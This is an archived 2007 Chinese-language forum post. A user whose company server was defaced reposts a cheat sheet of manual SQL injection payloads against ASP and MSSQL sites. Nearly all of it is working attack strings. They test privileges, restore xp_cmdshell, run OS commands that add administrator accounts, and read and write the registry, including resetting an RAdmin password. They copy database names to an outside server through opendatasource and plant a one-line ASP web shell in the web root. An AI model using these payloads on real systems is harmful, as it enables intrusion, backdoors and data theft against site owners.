ADJ網路實驗室 » Windows 系統討論 » 扔掉工具使用ASP手動 Hack！

查看完整版本: 扔掉工具使用ASP手動 Hack！

adj 2007-11-20 08:56

扔掉工具使用ASP手動 Hack！

[size=3][color=#ff80ff]最近公司的Windows Server遭Hack 變更首頁...經檢查Log發現手法跟這篇內容[/color][/size][size=3][color=#ff80ff]很神似...轉貼上來參考!!![/color][/size][size=3][color=#ff80ff][/color][/size] [size=3][color=#ff80ff]註：以下語法範例適用環境為[ ASP + MSSQL ]。[/color] [/size][size=3][/size][size=3][color=blue][/color][/size]
[size=3][color=blue]//檢測是否為db_owner權限[/color]
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]//檢測是否有讀取master的權限[/color]
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 -- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]數字類型[/color]
and char(124)%2Buser%2Bchar(124)=0 [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]字元類型
[/color]' and char(124)%2Buser%2Bchar(124)=0 and ''=' [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]搜索類型[/color]
' and char(124)%2Buser%2Bchar(124)=0 and '%'=' [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]洩漏使用者名[/color]
and user>0
' and user>0 and ''=' [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]檢測是否為SA權限[/color]
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 -- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]檢測是不是MSSQL資料庫[/color]
and exists (select * from sysobjects);-- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]檢測是否支持多行
[/color];declare @d int;-- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]恢復 xp_cmdshell[/color]
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]//-----------------------
// 執行命令
//-----------------------
首先開啟SendBox模式：
[/color]exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1 [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]然後利用jet.oledb執行系統命令[/color]
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")') [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]執行命令[/color]
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';-- [/size]
[size=3]EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111' [/size][size=3][color=#80ffff][color=blue][/color][/color][/size]
[size=3][color=#80ffff][color=blue]判斷xp_cmdshell是否存在：[/color]
[/color]http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell') [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]寫入登錄表[/color]
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1REG_SZ [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]讀登錄表[/color]
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit' [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]讀取目錄內容[/color]
exec master..xp_dirtree 'c:\winnt\system32\',1,1 [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]資料庫備份[/color]
backup database pubs to disk = 'c:\123.bak' [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]//洩漏出長度[/color]
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;-- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]更改sa密碼方法：用sql綜合利用工具連接後，執行命令：[/color]
exec sp_password NULL,'新密碼','sa' [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]新增和刪除一個具SA權限的用戶test：[/color]
exec master.dbo.sp_addlogin test,ptlove
exec master.dbo.sp_addsrvrolemember test,sysadmin [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]刪除xp_cmdshell的語法：[/color]
exec sp_dropextendedproc 'xp_cmdshell' [/size]
[size=3][color=royalblue][/color][/size]
[size=3][color=royalblue]添加延伸預存程序過程：
[/color]EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public [/size]
[size=3][color=blue][/color][/size] [size=3][color=blue]停掉或啟動某個服務：[/color] [/size][size=3]exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule' [/size][size=3]dbo.xp_subdirs [/size][size=3][color=blue][/color][/size]
[size=3][color=blue]只列出某個目錄下的子目錄：[/color]
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp' [/size]
[size=3]dbo.xp_makecab [/size][size=3][color=#80ffff][color=blue][/color][/color][/size]
[size=3][color=#80ffff][color=blue]將目標多個檔案壓縮到某個目標檔案之內。
所有要壓縮的檔案都可以接在參數列的最後方，以逗號隔開。[/color] [/color][/size]
[size=3]dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp' [/size][size=3][color=#80ffff][color=blue][/color][/color][/size]
[size=3][color=#80ffff][color=blue]xp_terminate_process 停掉某個執行中的程式，但賦予的參數是 Process ID。
利用”工作管理員”，透過選單「檢視」-「選擇欄位」勾選 pid，就可以看到每個執行程式的 Process ID[/color]
[/color]xp_terminate_process 2484 [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]xp_unpackcab 解開壓縮檔：[/color]
xp_unpackcab 'c:\test.cab','c:\temp',1 [/size]
[size=3][color=blue][/color][/size] [size=3][color=blue]某機，安裝了radmin，密碼被修改了，regedit.exe不知道被刪除了還是被改名了，net.exe不存在，沒有辦法使用regedit /e 導入註冊檔，但是mssql是sa許可權，使用如下命令[/color] [/size][size=3]EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密碼為12345678。如果要修改埠號 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 則埠號改為1234 [/size][size=3]create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null); [/size][size=3][color=blue][/color][/size]
[size=3][color=blue]//得到資料庫名稱[/color]
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]//在Master中創建表，看看權限怎樣[/color]
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);-- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]用 sp_makewebtask直接在web目錄裡寫入一句話木馬：
[/color][url=http://127.0.0.1/dblogin123.asp?username=123]http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20'[/url];-- [/size]
[size=3][color=blue][/color][/size]
[size=3][color=blue]//更新表內容
[/color]Update films SET kind = 'Dramatic' Where id = 123 [/size]
[size=3][color=blue]/[/color][/size]
[size=3][color=blue]/刪除內容
[/color]delete from table_name where Stockid = 3[/size]
[size=3][/size]
[size=3]文章引用: [url=http://anti-hacker.blogspot.com/2007/08/asp.html]http://anti-hacker.blogspot.com/2007/08/asp.html[/url] [/size]

頁: [1]

查看完整版本: 扔掉工具使用ASP手動 Hack！